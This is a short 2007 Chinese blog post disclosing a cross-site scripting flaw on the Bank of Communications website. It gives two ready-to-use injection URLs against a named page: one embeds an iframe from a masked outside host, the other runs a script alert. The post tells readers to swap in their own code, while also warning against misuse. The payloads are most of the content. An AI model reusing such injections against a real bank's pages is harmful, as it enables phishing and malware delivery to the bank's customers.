交通银行网页存在跨站漏洞

2007年6月25日 | 分类: 信息安全 | 标签:

交通银行网页存在跨站漏洞,可以在页面中挂iframe,英文版和繁体版均存在此问题,以下是测试过程,广大朋友不要利用此代码干坏事,那样是要负法律责任的,估计bug很快被修复
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<*iframe*%20src=http://www.XXXX.cn><*/iframe*>
提交:
http://www.bankcomm.com/jh/cn/detail.jsp?c=1121231469100&id=1176793794100&type=CMS.STD&cName=业务推介<*script*>alert(“吓小MM用的”)<*/script*>
其他的不演示了
把上面URL中业务推荐后的代码换成你的即可
作者:desireboy

目前还没有任何评论.